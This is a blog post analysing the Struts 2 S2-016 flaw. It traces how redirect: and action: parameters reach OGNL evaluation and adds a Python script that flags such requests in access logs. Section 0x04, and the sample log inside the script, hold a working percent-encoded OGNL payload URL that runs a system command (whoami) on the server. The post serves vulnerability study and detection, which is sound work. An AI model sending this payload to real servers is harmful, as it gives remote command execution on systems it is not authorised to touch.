Learning Man's Blog

S2-016 Vulnerability Analysis

2018/11/06

Affected versions

Struts 2.0.0 - Struts 2.3.15

0x01 Tips

Root cause: DefaultActionMapper handles the special parameter prefixes (note the four prefixes in the figure above: method:, action:, redirect:, redirectAction:), and the text after redirect: / redirectAction: is later evaluated as an OGNL expression. Dynamic method invocation is also enabled by default in this version.

The configuration shown below has no effect in this version: the only thing it changes is DefaultActionMapper.allowDynamicMethodCalls, and the redirect: and redirectAction: handlers never consult that flag (it only gates method: and the !method suffix of action:).

0x02 Analysis

Tracing the request

  1. The trace uses the 2.3.15 showcase. Request handling is split into two filters, StrutsPrepareFilter & StrutsExecuteFilter

  2. StrutsPrepareFilter runs first for the preparation work and calls PrepareOperations.findActionMapping()

  3. This enters DefaultActionMapper.getMapping, which calls handleSpecialParameters to process the request parameters

  4. handleSpecialParameters checks whether any parameter name matches one of the special prefix handlers

  5. The matching handler runs at the second breakpoint in the figure above: it takes the string after redirect: and stores it in the mapping as the Result (a ServletRedirectResult whose location is that string)

  6. The value is visible on the value stack

  7. Back in StrutsPrepareFilter, chain.doFilter is called (the other filters run first) and control reaches StrutsExecuteFilter

  8. ExecuteOperations.executeAction() runs

  9. This enters Dispatcher, which checks whether the mapping carries a Result and, if so, executes that Result directly instead of invoking the action

  10. This enters ServletRedirectResult (the result class created in step 5); its execute(), shown below, calls the parent's StrutsResultSupport.execute()

    // ServletRedirectResult.execute() in Struts 2.3.15: the anchor, if set,
    // goes through conditionalParse(), then StrutsResultSupport.execute()
    // does the same to the location taken from the redirect: parameter.
    public void execute(ActionInvocation invocation) throws Exception {
        if (this.anchor != null) {
            this.anchor = this.conditionalParse(this.anchor, invocation);
        }

        super.execute(invocation);
    }
  11. Then we see the familiar sink: StrutsResultSupport.execute() passes the location through conditionalParse(), which hands the ${...} in the redirect: string to the OGNL evaluator

0x03 Exploitation conditions

A vulnerable version (Struts 2.0.0 - 2.3.15; see the S2-016 advisory in the references)

0x04 Exploitation

action:, redirect: and redirectAction: can all be used for the attack. In the request below the OGNL sits in the parameter name itself (there is no = and no value); it runs whoami and writes the output back into the response:

http://localhost:8088/showcase.action?redirect:%24%7B%23req%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27%2B%27uest%27)%2C%23s%3Dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27%5C%5Cs%27))).start().getInputStream()).useDelimiter(%27%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27%2C%23resp%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27)%2C%23resp.setCharacterEncoding(%27UTF-8%27)%2C%23resp.getWriter().println(%23str)%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()%7D%0A
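As an added example (not code from the original post or from Apache Struts), the following Python script shows where the injection actually sits and how to spot it in traffic: it percent-decodes the query string the way the servlet container does before DefaultActionMapper sees it, checks each parameter name for the four special prefixes, and flags those whose remainder contains an OGNL marker. The access-log lines are constructed; the first carries the post's own payload URL. Function and constant names are this example's own.

```python
"""Where the S2-016 payload sits in a request, and how to spot it in logs.

Added example: not code from the original post or from Apache Struts.
SPECIAL_PREFIXES are the four prefixes DefaultActionMapper.handleSpecialParameters
knows in Struts 2.3.15; the access-log lines are constructed, the first one
carrying the post's own payload URL.  Function and constant names are ours.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# The four prefixes DefaultActionMapper handles in 2.3.15.
SPECIAL_PREFIXES = ("method:", "action:", "redirect:", "redirectAction:")

# Text after the prefix that contains one of these reaches the OGNL evaluator
# via conditionalParse(); a plain action name (redirectAction:index) does not.
OGNL_MARKERS = ("${", "%{")

# The post's payload, path only, split for readability; the sample log uses it.
POST_PAYLOAD_PATH = (
    "/showcase.action?redirect:%24%7B%23req%3D%23context.get(%27co%27%2B%27m.open%27"
    "%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27"
    "%2B%27uest%27)%2C%23s%3Dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder"
    "(%27whoami%27.toString().split(%27%5C%5Cs%27))).start().getInputStream())"
    ".useDelimiter(%27%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27"
    "%2C%23resp%3D%23context.get(%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2"
    ".disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27)%2C%23resp"
    ".setCharacterEncoding(%27UTF-8%27)%2C%23resp.getWriter().println(%23str)%2C%23resp"
    ".getWriter().flush()%2C%23resp.getWriter().close()%7D%0A"
)


def inspect_url(url):
    """Return one finding per query parameter whose NAME starts with a special
    prefix.  parse_qsl percent-decodes the name, which mirrors what the servlet
    container does before Struts reads request.getParameterMap()."""
    findings = []
    for name, _value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for prefix in SPECIAL_PREFIXES:
            if name.startswith(prefix):
                expression = name[len(prefix):]
                findings.append({
                    "prefix": prefix,
                    "expression": expression,
                    "ognl": any(marker in expression for marker in OGNL_MARKERS),
                })
                break
    return findings


# Only the request line of an NCSA-style log entry is needed.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Return (client, path, findings) for every log line whose request path
    carries a special-prefix parameter."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        path = match.group(1)
        findings = inspect_url(path)
        if findings:
            hits.append((line.split(" ", 1)[0], path, findings))
    return hits


# Constructed sample log: the post's payload, a benign request, an action:
# probe, and a redirectAction: use with no OGNL in it.
SAMPLE_LOG = [
    f'10.0.0.5 - - [06/Nov/2018:10:12:01 +0800] "GET {POST_PAYLOAD_PATH} HTTP/1.1" 200 7',
    '10.0.0.7 - - [06/Nov/2018:10:12:07 +0800] "GET /showcase.action?name=bob HTTP/1.1" 200 512',
    '10.0.0.9 - - [06/Nov/2018:10:12:09 +0800] "GET /showcase.action?action:%24%7B1%2B1%7D HTTP/1.1" 200 512',
    '10.0.0.9 - - [06/Nov/2018:10:12:11 +0800] "GET /showcase.action?redirectAction:index HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for client, path, findings in scan_access_log(SAMPLE_LOG):
        for f in findings:
            verdict = "OGNL in prefix parameter" if f["ognl"] else "prefix use, no OGNL"
            print(f"{client} {f['prefix']!r} {verdict}: {f['expression'][:60]!r}")
```

Two things the output makes visible: the whole payload is the parameter name (the URL contains no = at all), so a rule that inspects only parameter values never sees it; and the redirectAction:index line shows why the prefix alone is not a verdict, since the prefixes are a documented Struts feature and the ognl flag is what separates an exploit attempt from an application's own use.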

References

  1. https://cwiki.apache.org/confluence/display/WW/S2-016
  2. https://www.jianshu.com/p/de165430e8a8